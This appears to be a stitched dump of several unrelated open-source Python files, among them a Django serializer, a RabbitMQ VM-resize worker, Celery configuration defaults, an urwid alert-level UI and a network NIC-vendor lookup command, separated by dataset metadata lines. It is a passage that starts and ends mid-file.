attrs['event_types'] = list(attrs['event_types'])
return attrs
def get_hook_type(self, hook):
raise NotImplementedError
class SummaryHookSerializer(serializers.Serializer):
def to_representation(self, instance):
serializer = self.get_hook_serializer(instance.__class__)
return serializer(instance, context=self.context).data
def get_hook_serializer(self, cls):
for serializer in BaseHookSerializer.__subclasses__():
if serializer.Meta.model == cls:
return serializer
raise ValueError('Hook serializer for %s class is not found' % cls)
class WebHookSerializer(BaseHookSerializer):
content_type = NaturalChoiceField(models.WebHook.ContentTypeChoices.CHOICES, required=False)
class Meta(BaseHookSerializer.Meta):
model = models.WebHook
fields = BaseHookSerializer.Meta.fields + ('destination_url', 'content_type')
def get_hook_type(self, hook):
return 'webhook'
class PushHookSerializer(BaseHookSerializer):
type = NaturalChoiceField(models.PushHook.Type.CHOICES)
class Meta(BaseHookSerializer.Meta):
model = models.PushHook
fields = BaseHookSerializer.Meta.fields + ('type', 'device_id', 'token', 'device_manufacturer', 'device_model')
def get_hook_type(self, hook):
return 'pushhook'
class EmailHookSerializer(BaseHookSerializer):
class Meta(BaseHookSerializer.Meta):
model = models.EmailHook
fields = BaseHookSerializer.Meta.fields + ('email', )
def get_hook_type(self, hook):
return 'email'
|
mit
| 1,335,064,343,548,479,000
| 36.371622
| 119
| 0.654131
| false
| 4.36543
| false
| false
| false
|
omermahgoub/MigTool
|
Process/ResizeWorker.py
|
1
|
4412
|
__author__ = 'OmerMahgoub'
#!/usr/bin/env python
import time
import ast
import random
import pika
from common.VM import OpenStackAdapterVMInstance
from settings import settings
objSettings = settings.StackSettings()
# The below settings are coming from settings/setting.py which in return getting all the configurations from config.yml file
# Start of Settings Configuration
stackSettings = objSettings.ServiceSettings("OpenStack")
queueHostSettings = objSettings.ServiceSettings("rabbitMQ")
queueSettings = objSettings.ServiceSettings("QueueSettings")
# End of Settings Configuration
# Connection Initialization for RabbitMQ Server
count = queueSettings['retryCount']
connection = pika.BlockingConnection(pika.ConnectionParameters(
host=queueHostSettings["host"]))
channel = connection.channel()
# User Queue Declaration
channel.queue_declare(queue=queueSettings['ResizeQueueName'], durable=True)
print ' [*] Waiting for messages. To exit press CTRL+C'
# Send_To_VM_Queue is a Method which accepts the msg from User Queue and throws the Message to VM Queue
def Notification_Queue(UserMsg):
pass
# The callback method is to iterate the message in the Queue. It will keep on checking for new messages
def callback(ch, method, properties, body):
print " [x] Received %r" % (body,)
time.sleep(5)
# Split the body into seperate items
strMessage = ast.literal_eval(body)
bodyMessage = strMessage['body']
planMessage = strMessage['PlanDetails']['ItemDetails']
itemsList = bodyMessage.split(",")
orderId = itemsList[0]
userid = itemsList[1]
email = itemsList[2]
planname = itemsList[3]
projectname = itemsList[4]
requestType = itemsList[5]
serverId = itemsList[6]
objStack = OpenStackAdapterVMInstance()
# def VMQueue(self, VmName, ImageName, FlavorName, ProjectName):
msg = objStack.ResizeInstance(ServerId = serverId, FlavorName = planMessage['Flavor'], ProjectName = projectname)
print "VM Resize Status (True/False) %s" % msg
# First Get the Retry Times from the First Message
print "Retry Count: %s" % properties.headers["retry_count"]
if properties.headers["retry_count"] > count:
print("Saving in DB")
ch.basic_ack(delivery_tag=method.delivery_tag)
else:
try:
if msg['Status'] == False or msg['Status'] == "Error":
raise Exception("VM can't be created due to some reasons.Re-Queuing the Message again")
else:
ch.basic_ack(delivery_tag=method.delivery_tag)
print "Successfully Operated and removed from Queue"
# Throw the Project Creation Message to User Queue
Notification_Queue(body)
# End of Throwing Message to Project Queue
except:
print "Just Reached Exception Area"
print "Before setting header, Count was %s" % properties.headers["retry_count"]
# Setting the Header and incrementing to 1
headers = { # example how headers can be used
'retry_count': properties.headers["retry_count"] + 1
}
# Creating the message in the Queue Again
channel.basic_publish(
exchange='',
routing_key=queueSettings['ResizeQueueName'],
body=body, # must be string
properties=pika.BasicProperties(
delivery_mode=2, # makes persistent job
priority=0, # default priority
# timestamp=timestamp, # timestamp of job creation
# expiration=str(expire), # job expiration (milliseconds from now), must be string, handled by rabbitmq
headers=headers
))
# Acknowledges that the Message is success and then through back the message to Queue.
channel.basic_ack(delivery_tag=method.delivery_tag)
print "Queue Acknowledged and removed"
print "[++++++Done+++++]"
print
channel.basic_qos(prefetch_count=1)
channel.basic_consume(callback, queue=queueSettings['ResizeQueueName'])
try:
channel.start_consuming()
except KeyboardInterrupt:
channel.stop_consuming();
connection.close()
|
gpl-3.0
| 1,589,770,511,240,852,000
| 35.092437
| 124
| 0.644379
| false
| 4.296008
| false
| false
| false
|
n9code/calm
|
setup.py
|
1
|
1439
|
from os import path
import codecs
from setuptools import setup, find_packages
here = path.abspath(path.dirname(__file__))
with codecs.open(path.join(here, 'requirements.txt'),
encoding='utf-8') as reqs:
requirements = reqs.read()
setup(
name='calm',
version='0.1.4',
description='It is always Calm before a Tornado!',
long_description="""
Calm is an extension to Tornado Framework for building RESTful APIs.
Navigate to http://calm.n9co.de for more information.
""",
url='http://calm.n9co.de',
author='Bagrat Aznauryan',
author_email='bagrat@aznauryan.org',
license='MIT',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Information Technology',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3 :: Only',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: HTTP Servers',
'Topic :: Software Development',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Application Frameworks',
],
keywords='tornado rest restful api framework',
packages=find_packages(exclude=['docs', 'tests']),
install_requires=requirements,
)
|
mit
| -1,791,420,317,329,591,000
| 25.648148
| 79
| 0.624044
| false
| 4.18314
| false
| false
| false
|
sqall01/alertR
|
managerClientConsole/lib/manager/elementAlertLevel.py
|
1
|
14639
|
#!/usr/bin/env python3
# written by sqall
# twitter: https://twitter.com/sqall01
# blog: https://h4des.org
# github: https://github.com/sqall01
#
# Licensed under the GNU Affero General Public License, version 3.
import time
import urwid
from typing import List
from ..globalData import ManagerObjSensor, ManagerObjAlert, ManagerObjAlertLevel, ManagerObjProfile, SensorDataType
# this class is an urwid object for an alert level
class AlertLevelUrwid:
def __init__(self, alertLevel: ManagerObjAlertLevel):
# store reference to alert level object
self.alertLevel = alertLevel
# store reference in alert level object to
# this urwid alert level object
self.alertLevel.internal_data["urwid"] = self
alertLevelPileList = list()
self.nameWidget = urwid.Text("Name: " + self.alertLevel.name)
alertLevelPileList.append(self.nameWidget)
alertLevelPile = urwid.Pile(alertLevelPileList)
alertLevelBox = urwid.LineBox(alertLevelPile, title="Level: %d" % self.alertLevel.level)
paddedAlertLevelBox = urwid.Padding(alertLevelBox, left=1, right=1)
# set the color of the urwid object
self.alertLevelUrwidMap = urwid.AttrMap(paddedAlertLevelBox, "greenColor")
self.alertLevelUrwidMap.set_focus_map({None: "greenColor_focus"})
# this function returns the final urwid widget that is used
# to render the box of an alert level
def get(self) -> urwid.AttrMap:
return self.alertLevelUrwidMap
# this function updates the description of the object
def updateName(self, name: str):
self.nameWidget.set_text("Name: " + name)
# this function changes the color of this urwid object to red
def turnRed(self):
self.alertLevelUrwidMap.set_attr_map({None: "redColor"})
self.alertLevelUrwidMap.set_focus_map({None: "redColor_focus"})
# this function changes the color of this urwid object to green
def turnGreen(self):
self.alertLevelUrwidMap.set_attr_map({None: "greenColor"})
self.alertLevelUrwidMap.set_focus_map({None: "greenColor_focus"})
# this function changes the color of this urwid object to gray
def turnGray(self):
self.alertLevelUrwidMap.set_attr_map({None: "grayColor"})
self.alertLevelUrwidMap.set_focus_map({None: "grayColor_focus"})
# this function changes the color of this urwid object to the
# neutral color scheme
def turnNeutral(self):
self.alertLevelUrwidMap.set_attr_map({None: "neutral"})
# this function updates all internal widgets and checks if
# the alert level still exists
def updateCompleteWidget(self):
# check if alert level still exists
if self.alertLevel.is_deleted():
# return false if object no longer exists
return False
self.turnGreen()
self.updateName(self.alertLevel.name)
# return true if object was updated
return True
# this functions sets the color when the connection to the server has failed.
def setConnectionFail(self):
self.alertLevelUrwidMap.set_attr_map({None: "connectionfail"})
self.alertLevelUrwidMap.set_focus_map({None: "connectionfail_focus"})
# this class is an urwid object for a detailed alert level output
class AlertLevelDetailedUrwid:
def __init__(self,
alertLevel: ManagerObjAlertLevel,
sensors: List[ManagerObjSensor],
alerts: List[ManagerObjAlert],
profiles: List[ManagerObjProfile]):
self.alertLevel = alertLevel
content = list()
content.append(urwid.Divider("="))
content.append(urwid.Text("Alert Level"))
content.append(urwid.Divider("="))
temp = self._createAlertLevelWidgetList(alertLevel)
self.alertLevelPileWidget = urwid.Pile(temp)
content.append(self.alertLevelPileWidget)
content.append(urwid.Divider())
content.append(urwid.Divider("="))
content.append(urwid.Text("Profiles"))
content.append(urwid.Divider("="))
temp = self._create_profiles_widget_list(profiles)
self._profiles_pile_widget = urwid.Pile(temp)
content.append(self._profiles_pile_widget)
content.append(urwid.Divider())
content.append(urwid.Divider("="))
content.append(urwid.Text("Alerts"))
content.append(urwid.Divider("="))
temp = self._createAlertsWidgetList(alerts)
self.alertsPileWidget = urwid.Pile(temp)
content.append(self.alertsPileWidget)
content.append(urwid.Divider())
content.append(urwid.Divider("="))
content.append(urwid.Text("Sensors"))
content.append(urwid.Divider("="))
temp = self._createSensorsWidgetList(sensors)
self.sensorsPileWidget = urwid.Pile(temp)
content.append(self.sensorsPileWidget)
# use ListBox here because it handles all the
# scrolling part automatically
detailedList = urwid.ListBox(urwid.SimpleListWalker(content))
detailedFrame = urwid.Frame(detailedList, footer=urwid.Text("Keys: ESC - Back, Up/Down - Scrolling"))
self.detailedBox = urwid.LineBox(detailedFrame, title="Alert Level: " + self.alertLevel.name)
# this function creates the detailed output of a alert level object
# in a list
def _createAlertLevelWidgetList(self, alertLevel: ManagerObjAlertLevel) -> List[urwid.Widget]:
temp = list()
temp.append(urwid.Text("Alert Level:"))
temp.append(urwid.Text(str(alertLevel.level)))
temp.append(urwid.Divider())
temp.append(urwid.Text("Name:"))
temp.append(urwid.Text(alertLevel.name))
temp.append(urwid.Divider())
temp.append(urwid.Text("Profiles:"))
profile_str = ", ".join(map(lambda x: str(x), alertLevel.profiles))
temp.append(urwid.Text(profile_str))
temp.append(urwid.Divider())
temp.append(urwid.Text("Instrumentation Activated:"))
if alertLevel.instrumentation_active is None:
temp.append(urwid.Text("Undefined"))
elif alertLevel.instrumentation_active:
temp.append(urwid.Text("Yes"))
temp.append(urwid.Divider())
temp.append(urwid.Text("Instrumentation Cmd:"))
temp.append(urwid.Text(alertLevel.instrumentation_cmd))
temp.append(urwid.Divider())
temp.append(urwid.Text("Instrumentation Timeout:"))
temp.append(urwid.Text(str(alertLevel.instrumentation_timeout) + " Seconds"))
else:
temp.append(urwid.Text("No"))
return temp
# this function creates the detailed output of all alert objects
# in a list
def _createAlertsWidgetList(self, alerts: List[ManagerObjAlert]) -> List[urwid.Widget]:
temp = list()
first = True
for alert in alerts:
if first:
first = False
else:
temp.append(urwid.Divider())
temp.append(urwid.Divider("-"))
temp.extend(self._createAlertWidgetList(alert))
if not temp:
temp.append(urwid.Text("None"))
return temp
# this function creates the detailed output of a alert object
# in a list
def _createAlertWidgetList(self, alert: ManagerObjAlert) -> List[urwid.Widget]:
temp = list()
temp.append(urwid.Text("Node ID:"))
temp.append(urwid.Text(str(alert.nodeId)))
temp.append(urwid.Divider())
temp.append(urwid.Text("Alert ID:"))
temp.append(urwid.Text(str(alert.alertId)))
temp.append(urwid.Divider())
temp.append(urwid.Text("Client Alert ID:"))
temp.append(urwid.Text(str(alert.clientAlertId)))
temp.append(urwid.Divider())
temp.append(urwid.Text("Description:"))
temp.append(urwid.Text(alert.description))
return temp
# this function creates the detailed output of all profile objects in a list
def _create_profiles_widget_list(self, profiles: List[ManagerObjProfile]) -> List[urwid.Widget]:
temp = list()
first = True
for profile in profiles:
if first:
first = False
else:
temp.append(urwid.Divider())
temp.append(urwid.Divider("-"))
temp.extend(self._create_profile_widget_list(profile))
if not temp:
temp.append(urwid.Text("None"))
return temp
# this function creates the detailed output of a profile object in a list
def _create_profile_widget_list(self, profile: ManagerObjProfile) -> List[urwid.Widget]:
temp = list()
temp.append(urwid.Text("Profile ID:"))
temp.append(urwid.Text(str(profile.profileId)))
temp.append(urwid.Divider())
temp.append(urwid.Text("Name:"))
temp.append(urwid.Text(profile.name))
return temp
# this function creates the detailed output of all sensor objects
# in a list
def _createSensorsWidgetList(self, sensors: List[ManagerObjSensor]) -> List[urwid.Widget]:
temp = list()
first = True
for sensor in sensors:
if first:
first = False
else:
temp.append(urwid.Divider())
temp.append(urwid.Divider("-"))
temp.extend(self._createSensorWidgetList(sensor))
if not temp:
temp.append(urwid.Text("None"))
return temp
# this function creates the detailed output of a sensor object
# in a list
def _createSensorWidgetList(self, sensor: ManagerObjSensor) -> List[urwid.Widget]:
temp = list()
temp.append(urwid.Text("Node ID:"))
temp.append(urwid.Text(str(sensor.nodeId)))
temp.append(urwid.Divider())
temp.append(urwid.Text("Sensor ID:"))
temp.append(urwid.Text(str(sensor.sensorId)))
temp.append(urwid.Divider())
temp.append(urwid.Text("Client Sensor ID:"))
temp.append(urwid.Text(str(sensor.clientSensorId)))
temp.append(urwid.Divider())
temp.append(urwid.Text("Alert Delay:"))
temp.append(urwid.Text(str(sensor.alertDelay) + " Seconds"))
temp.append(urwid.Divider())
temp.append(urwid.Text("Description:"))
temp.append(urwid.Text(sensor.description))
temp.append(urwid.Divider())
temp.append(urwid.Text("State:"))
if sensor.state == 0:
temp.append(urwid.AttrMap(urwid.Text("Normal"), "neutral"))
elif sensor.state == 1:
temp.append(urwid.AttrMap(urwid.Text("Triggered"), "sensoralert"))
else:
temp.append(urwid.AttrMap(urwid.Text("Undefined"), "redColor"))
temp.append(urwid.Divider())
temp.append(urwid.Text("Data Type:"))
if sensor.dataType == SensorDataType.NONE:
temp.append(urwid.Text("None"))
elif sensor.dataType == SensorDataType.INT:
temp.append(urwid.Text("Integer"))
elif sensor.dataType == SensorDataType.FLOAT:
temp.append(urwid.Text("Floating Point"))
else:
temp.append(urwid.Text("Unknown"))
temp.append(urwid.Divider())
temp.append(urwid.Text("Data:"))
if sensor.dataType == SensorDataType.NONE:
temp.append(urwid.Text("None"))
else:
temp.append(urwid.Text(str(sensor.data)))
temp.append(urwid.Divider())
temp.append(urwid.Text("Last Updated (Server Time):"))
lastUpdatedWidget = urwid.Text(time.strftime("%D %H:%M:%S", time.localtime(sensor.lastStateUpdated)))
temp.append(lastUpdatedWidget)
return temp
# this function returns the final urwid widget that is used
# to render this object
def get(self) -> urwid.LineBox:
return self.detailedBox
# this function updates all internal widgets
def updateCompleteWidget(self,
sensors: List[ManagerObjSensor],
alerts: List[ManagerObjAlert],
profiles: List[ManagerObjProfile]):
self.updateAlertLevelDetails()
self.updateSensorsDetails(sensors)
self.updateAlertsDetails(alerts)
self.update_profile_details(profiles)
# this function updates the alert level information shown
def updateAlertLevelDetails(self):
# crate new sensor pile content
temp = self._createAlertLevelWidgetList(self.alertLevel)
# create a list of tuples for the pile widget
pileOptions = self.alertLevelPileWidget.options()
temp = [(x, pileOptions) for x in temp]
# empty pile widget contents and replace it with the new widgets
del self.alertLevelPileWidget.contents[:]
self.alertLevelPileWidget.contents.extend(temp)
# this function updates the node information shown
def updateAlertsDetails(self, alerts: List[ManagerObjAlert]):
# crate new sensor pile content
temp = self._createAlertsWidgetList(alerts)
# create a list of tuples for the pile widget
pileOptions = self.alertsPileWidget.options()
temp = [(x, pileOptions) for x in temp]
# empty pile widget contents and replace it with the new widgets
del self.alertsPileWidget.contents[:]
self.alertsPileWidget.contents.extend(temp)
def update_profile_details(self, profiles: List[ManagerObjProfile]):
"""
This function updates the profile information shown.
:param profiles:
"""
temp = self._create_profiles_widget_list(profiles)
# Create a list of tuples for the pile widget.
pile_options = self._profiles_pile_widget.options()
new_profiles_list = [(x, pile_options) for x in temp]
# Empty pile widget contents and replace it with the new widgets.
del self._profiles_pile_widget.contents[:]
self._profiles_pile_widget.contents.extend(new_profiles_list)
# this function updates the sensor information shown
def updateSensorsDetails(self, sensors: List[ManagerObjSensor]):
# crate new sensor pile content
temp = self._createSensorsWidgetList(sensors)
# create a list of tuples for the pile widget
pileOptions = self.sensorsPileWidget.options()
temp = [(x, pileOptions) for x in temp]
# empty pile widget contents and replace it with the new widgets
del self.sensorsPileWidget.contents[:]
self.sensorsPileWidget.contents.extend(temp)
|
agpl-3.0
| -2,799,409,555,636,106,000
| 35.415423
| 115
| 0.644784
| false
| 3.915218
| false
| false
| false
|
sivaprakashniet/push_pull
|
p2p/lib/python2.7/site-packages/celery/app/defaults.py
|
1
|
11107
|
# -*- coding: utf-8 -*-
"""
celery.app.defaults
~~~~~~~~~~~~~~~~~~~
Configuration introspection and defaults.
"""
from __future__ import absolute_import
import sys
from collections import deque, namedtuple
from datetime import timedelta
from celery.five import items
from celery.utils import strtobool
from celery.utils.functional import memoize
__all__ = ['Option', 'NAMESPACES', 'flatten', 'find']
is_jython = sys.platform.startswith('java')
is_pypy = hasattr(sys, 'pypy_version_info')
DEFAULT_POOL = 'prefork'
if is_jython:
DEFAULT_POOL = 'threads'
elif is_pypy:
if sys.pypy_version_info[0:3] < (1, 5, 0):
DEFAULT_POOL = 'solo'
else:
DEFAULT_POOL = 'prefork'
DEFAULT_ACCEPT_CONTENT = ['json', 'pickle', 'msgpack', 'yaml']
DEFAULT_PROCESS_LOG_FMT = """
[%(asctime)s: %(levelname)s/%(processName)s] %(message)s
""".strip()
DEFAULT_LOG_FMT = '[%(asctime)s: %(levelname)s] %(message)s'
DEFAULT_TASK_LOG_FMT = """[%(asctime)s: %(levelname)s/%(processName)s] \
%(task_name)s[%(task_id)s]: %(message)s"""
_BROKER_OLD = {'deprecate_by': '2.5', 'remove_by': '4.0',
'alt': 'BROKER_URL setting'}
_REDIS_OLD = {'deprecate_by': '2.5', 'remove_by': '4.0',
'alt': 'URL form of CELERY_RESULT_BACKEND'}
searchresult = namedtuple('searchresult', ('namespace', 'key', 'type'))
class Option(object):
alt = None
deprecate_by = None
remove_by = None
typemap = dict(string=str, int=int, float=float, any=lambda v: v,
bool=strtobool, dict=dict, tuple=tuple)
def __init__(self, default=None, *args, **kwargs):
self.default = default
self.type = kwargs.get('type') or 'string'
for attr, value in items(kwargs):
setattr(self, attr, value)
def to_python(self, value):
return self.typemap[self.type](value)
def __repr__(self):
return '<Option: type->{0} default->{1!r}>'.format(self.type,
self.default)
NAMESPACES = {
'BROKER': {
'URL': Option(None, type='string'),
'CONNECTION_TIMEOUT': Option(4, type='float'),
'CONNECTION_RETRY': Option(True, type='bool'),
'CONNECTION_MAX_RETRIES': Option(100, type='int'),
'FAILOVER_STRATEGY': Option(None, type='string'),
'HEARTBEAT': Option(None, type='int'),
'HEARTBEAT_CHECKRATE': Option(3.0, type='int'),
'LOGIN_METHOD': Option(None, type='string'),
'POOL_LIMIT': Option(10, type='int'),
'USE_SSL': Option(False, type='bool'),
'TRANSPORT': Option(type='string'),
'TRANSPORT_OPTIONS': Option({}, type='dict'),
'HOST': Option(type='string', **_BROKER_OLD),
'PORT': Option(type='int', **_BROKER_OLD),
'USER': Option(type='string', **_BROKER_OLD),
'PASSWORD': Option(type='string', **_BROKER_OLD),
'VHOST': Option(type='string', **_BROKER_OLD),
},
'CASSANDRA': {
'COLUMN_FAMILY': Option(type='string'),
'DETAILED_MODE': Option(False, type='bool'),
'KEYSPACE': Option(type='string'),
'READ_CONSISTENCY': Option(type='string'),
'SERVERS': Option(type='list'),
'WRITE_CONSISTENCY': Option(type='string'),
},
'CELERY': {
'ACCEPT_CONTENT': Option(DEFAULT_ACCEPT_CONTENT, type='list'),
'ACKS_LATE': Option(False, type='bool'),
'ALWAYS_EAGER': Option(False, type='bool'),
'ANNOTATIONS': Option(type='any'),
'FORCE_BILLIARD_LOGGING': Option(True, type='bool'),
'BROADCAST_QUEUE': Option('celeryctl'),
'BROADCAST_EXCHANGE': Option('celeryctl'),
'BROADCAST_EXCHANGE_TYPE': Option('fanout'),
'CACHE_BACKEND': Option(),
'CACHE_BACKEND_OPTIONS': Option({}, type='dict'),
'CHORD_PROPAGATES': Option(True, type='bool'),
'COUCHBASE_BACKEND_SETTINGS': Option(None, type='dict'),
'CREATE_MISSING_QUEUES': Option(True, type='bool'),
'DEFAULT_RATE_LIMIT': Option(type='string'),
'DISABLE_RATE_LIMITS': Option(False, type='bool'),
'DEFAULT_ROUTING_KEY': Option('celery'),
'DEFAULT_QUEUE': Option('celery'),
'DEFAULT_EXCHANGE': Option('celery'),
'DEFAULT_EXCHANGE_TYPE': Option('direct'),
'DEFAULT_DELIVERY_MODE': Option(2, type='string'),
'EAGER_PROPAGATES_EXCEPTIONS': Option(False, type='bool'),
'ENABLE_UTC': Option(True, type='bool'),
'ENABLE_REMOTE_CONTROL': Option(True, type='bool'),
'EVENT_SERIALIZER': Option('json'),
'EVENT_QUEUE_EXPIRES': Option(None, type='float'),
'EVENT_QUEUE_TTL': Option(None, type='float'),
'IMPORTS': Option((), type='tuple'),
'INCLUDE': Option((), type='tuple'),
'IGNORE_RESULT': Option(False, type='bool'),
'MAX_CACHED_RESULTS': Option(5000, type='int'),
'MESSAGE_COMPRESSION': Option(type='string'),
'MONGODB_BACKEND_SETTINGS': Option(type='dict'),
'REDIS_HOST': Option(type='string', **_REDIS_OLD),
'REDIS_PORT': Option(type='int', **_REDIS_OLD),
'REDIS_DB': Option(type='int', **_REDIS_OLD),
'REDIS_PASSWORD': Option(type='string', **_REDIS_OLD),
'REDIS_MAX_CONNECTIONS': Option(type='int'),
'RESULT_BACKEND': Option(type='string'),
'RESULT_DB_SHORT_LIVED_SESSIONS': Option(False, type='bool'),
'RESULT_DB_TABLENAMES': Option(type='dict'),
'RESULT_DBURI': Option(),
'RESULT_ENGINE_OPTIONS': Option(type='dict'),
'RESULT_EXCHANGE': Option('celeryresults'),
'RESULT_EXCHANGE_TYPE': Option('direct'),
'RESULT_SERIALIZER': Option('pickle'),
'RESULT_PERSISTENT': Option(None, type='bool'),
'ROUTES': Option(type='any'),
'SEND_EVENTS': Option(False, type='bool'),
'SEND_TASK_ERROR_EMAILS': Option(False, type='bool'),
'SEND_TASK_SENT_EVENT': Option(False, type='bool'),
'STORE_ERRORS_EVEN_IF_IGNORED': Option(False, type='bool'),
'TASK_PUBLISH_RETRY': Option(True, type='bool'),
'TASK_PUBLISH_RETRY_POLICY': Option({
'max_retries': 3,
'interval_start': 0,
'interval_max': 1,
'interval_step': 0.2}, type='dict'),
'TASK_RESULT_EXPIRES': Option(timedelta(days=1), type='float'),
'TASK_SERIALIZER': Option('pickle'),
'TIMEZONE': Option(type='string'),
'TRACK_STARTED': Option(False, type='bool'),
'REDIRECT_STDOUTS': Option(True, type='bool'),
'REDIRECT_STDOUTS_LEVEL': Option('WARNING'),
'QUEUES': Option(type='dict'),
'QUEUE_HA_POLICY': Option(None, type='string'),
'SECURITY_KEY': Option(type='string'),
'SECURITY_CERTIFICATE': Option(type='string'),
'SECURITY_CERT_STORE': Option(type='string'),
'WORKER_DIRECT': Option(False, type='bool'),
},
'CELERYD': {
'AGENT': Option(None, type='string'),
'AUTOSCALER': Option('celery.worker.autoscale:Autoscaler'),
'AUTORELOADER': Option('celery.worker.autoreload:Autoreloader'),
'CONCURRENCY': Option(0, type='int'),
'TIMER': Option(type='string'),
'TIMER_PRECISION': Option(1.0, type='float'),
'FORCE_EXECV': Option(False, type='bool'),
'HIJACK_ROOT_LOGGER': Option(True, type='bool'),
'CONSUMER': Option('celery.worker.consumer:Consumer', type='string'),
'LOG_FORMAT': Option(DEFAULT_PROCESS_LOG_FMT),
'LOG_COLOR': Option(type='bool'),
'LOG_LEVEL': Option('WARN', deprecate_by='2.4', remove_by='4.0',
alt='--loglevel argument'),
'LOG_FILE': Option(deprecate_by='2.4', remove_by='4.0',
alt='--logfile argument'),
'MAX_TASKS_PER_CHILD': Option(type='int'),
'POOL': Option(DEFAULT_POOL),
'POOL_PUTLOCKS': Option(True, type='bool'),
'POOL_RESTARTS': Option(False, type='bool'),
'PREFETCH_MULTIPLIER': Option(4, type='int'),
'STATE_DB': Option(),
'TASK_LOG_FORMAT': Option(DEFAULT_TASK_LOG_FMT),
'TASK_SOFT_TIME_LIMIT': Option(type='float'),
'TASK_TIME_LIMIT': Option(type='float'),
'WORKER_LOST_WAIT': Option(10.0, type='float')
},
'CELERYBEAT': {
'SCHEDULE': Option({}, type='dict'),
'SCHEDULER': Option('celery.beat:PersistentScheduler'),
'SCHEDULE_FILENAME': Option('celerybeat-schedule'),
'MAX_LOOP_INTERVAL': Option(0, type='float'),
'LOG_LEVEL': Option('INFO', deprecate_by='2.4', remove_by='4.0',
alt='--loglevel argument'),
'LOG_FILE': Option(deprecate_by='2.4', remove_by='4.0',
alt='--logfile argument'),
},
'CELERYMON': {
'LOG_LEVEL': Option('INFO', deprecate_by='2.4', remove_by='4.0',
alt='--loglevel argument'),
'LOG_FILE': Option(deprecate_by='2.4', remove_by='4.0',
alt='--logfile argument'),
'LOG_FORMAT': Option(DEFAULT_LOG_FMT),
},
'EMAIL': {
'HOST': Option('localhost'),
'PORT': Option(25, type='int'),
'HOST_USER': Option(),
'HOST_PASSWORD': Option(),
'TIMEOUT': Option(2, type='float'),
'USE_SSL': Option(False, type='bool'),
'USE_TLS': Option(False, type='bool'),
},
'SERVER_EMAIL': Option('celery@localhost'),
'ADMINS': Option((), type='tuple'),
}
def flatten(d, ns=''):
stack = deque([(ns, d)])
while stack:
name, space = stack.popleft()
for key, value in items(space):
if isinstance(value, dict):
stack.append((name + key + '_', value))
else:
yield name + key, value
DEFAULTS = dict((key, value.default) for key, value in flatten(NAMESPACES))
def find_deprecated_settings(source):
from celery.utils import warn_deprecated
for name, opt in flatten(NAMESPACES):
if (opt.deprecate_by or opt.remove_by) and getattr(source, name, None):
warn_deprecated(description='The {0!r} setting'.format(name),
deprecation=opt.deprecate_by,
removal=opt.remove_by,
alternative='Use the {0.alt} instead'.format(opt))
return source
@memoize(maxsize=None)
def find(name, namespace='celery'):
# - Try specified namespace first.
namespace = namespace.upper()
try:
return searchresult(
namespace, name.upper(), NAMESPACES[namespace][name.upper()],
)
except KeyError:
# - Try all the other namespaces.
for ns, keys in items(NAMESPACES):
if ns.upper() == name.upper():
return searchresult(None, ns, keys)
elif isinstance(keys, dict):
try:
return searchresult(ns, name.upper(), keys[name.upper()])
except KeyError:
pass
# - See if name is a qualname last.
return searchresult(None, name.upper(), DEFAULTS[name.upper()])
|
bsd-3-clause
| -1,949,531,072,986,532,400
| 40.289963
| 79
| 0.570451
| false
| 3.60266
| false
| false
| false
|
peterlei/fboss
|
fboss/py/fboss/cli/commands/nic.py
|
1
|
2427
|
#!/usr/bin/env python3
#
# Copyright (c) 2004-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
from fboss.cli.commands import commands as cmds
from fboss.cli.data.oui_to_vendor_ieee import NIC_VENDOR_OUI_MAP
class NicCmd(cmds.PrintNeighborTableCmd):
'''Class for host NIC related commands in fboss.'''
_LENGTH_OF_OUI = 8
_NO_MAC_FOUND_MESSAGE = "No MAC address found in ARP/NDP tables found."
_UNKNOWN_VENDOR_MESSAGE = "Unknown NIC Vendor."
def run(self, detail, verbose):
self._client = self._create_agent_client()
# Get the MAC addresses for IPV4.
arp_table_detailed = self._client.getArpTable()
arp_mac_addresses = [arp_mac.mac for arp_mac in arp_table_detailed]
# Get the MAC addresses for IPV6.
ndp_table_detailed = self._client.getNdpTable()
ndp_mac_addresses = [ndp_mac.mac for ndp_mac in ndp_table_detailed]
mac_address_set = set(arp_mac_addresses + ndp_mac_addresses)
# Ignore the broadcast mac.
mac_address_set -= set(['ff:ff:ff:ff:ff:ff', 'FF:FF:FF:FF:FF:FF'])
if not len(mac_address_set):
print(self._NO_MAC_FOUND_MESSAGE)
return
mac_nic_dictionary = {}
for mac in mac_address_set:
oui = mac[:self._LENGTH_OF_OUI].upper()
if oui in NIC_VENDOR_OUI_MAP.keys():
mac_nic_dictionary[mac] = NIC_VENDOR_OUI_MAP[oui]
else:
mac_nic_dictionary[mac] = self._UNKNOWN_VENDOR_MESSAGE
if detail or verbose:
for mac_address, vendor_name in mac_nic_dictionary.items():
print("MAC Address: " + mac_address + " Vendor: " + vendor_name)
return
# Non verbose output needs only NIC vendor names.
nic_vendor_set = set(mac_nic_dictionary.values())
response = ""
if len(nic_vendor_set) == 0:
response = self._NO_MAC_FOUND_MESSAGE
elif len(nic_vendor_set) > 1:
response += ", ".join(str(nic_vendor_iterator)
for nic_vendor_iterator in nic_vendor_set)
else:
response += nic_vendor_set.pop()
print(response)
|
bsd-3-clause
| 5,845,180,241,870,015,000
| 35.772727
| 80
| 0.613103
| false
| 3.532751
| false
| false
| false
|
pythonprobr/pythonpro-website
|
pythonpro/cohorts/facade.py
|
1
|
2292
|
from functools import partial
from django.conf import settings
from django.core.cache import cache
from django.db.models import Prefetch as _Prefetch
from django.urls import reverse
from pythonpro.cohorts.models import Cohort as _Cohort, CohortStudent, LiveClass as _LiveClass, Webinar as _Webinar
__all__ = [
'get_all_cohorts_desc',
'find_cohort',
'find_most_recent_cohort',
'calculate_most_recent_cohort_path',
'find_webinars',
'find_webinar',
'find_live_class',
]
def get_all_cohorts_desc():
lazy_all_cohorts = partial(tuple, _Cohort.objects.order_by('-start'))
return cache.get_or_set('ALL_COHORTS', lazy_all_cohorts, settings.CACHE_TTL)
def find_cohort(slug):
return _Cohort.objects.filter(slug=slug).prefetch_related(
_Prefetch(
'liveclass_set',
